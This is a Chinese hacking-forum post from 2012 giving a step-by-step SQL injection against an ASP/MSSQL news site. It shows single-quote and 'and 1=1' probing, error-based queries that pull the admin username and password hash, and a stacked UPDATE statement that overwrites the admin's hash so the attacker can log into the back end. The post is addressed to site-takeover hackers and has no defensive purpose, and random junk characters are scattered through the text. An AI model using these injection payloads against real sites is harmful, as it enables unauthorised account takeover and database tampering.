经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
, N0 ~3 v, w" ~6 [' N3 v可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL) O& Y! ?2 h$ ?1 o W5 [6 p
测试如下:
3 [/ e9 f$ M) @; l9 P( e" S* V. Dhttp://www.tmdsb.com/news.asp?id=1214 x0 t: I" \! Z' |. z: z0 \
在地址后输入单引号,显示
- X G$ F& X% M% g+ jMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
( n0 w- h/ k ?字符串 ’’’ 之前有未闭合的引号9 z6 c4 x7 W1 @5 C2 Q
/news/tmdws.asp,行63) B A; u% T, H& I
说明没有过滤单引号且数据库是MSSQL.0 v; @' d5 l$ G6 [* h/ l
and 1=1正常。and 1=2出错。肯定存在注入# Q0 f: Q2 q# ~
接着输入
7 g$ F9 ~/ v! e4 }0 H5 R: t/ xhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin); m. u2 |% u& s |
得到帐号为:admin
# ^" A- ?" `% L* t. J1 C2 e1 h H; c8 Rhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
) Z: P: L3 _- H) m5 E9 ~得到密码为:a4716077c2ba075c/ I0 @! j Q+ \9 l! v" C
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
/ X3 `" Q. b' c5 U. a- h8 a U; ^7 @命令如下 :
. P( P* q3 S# g) x6 b& j- j;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–0 {( \9 O) c6 Q! g* V% G8 D: z
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41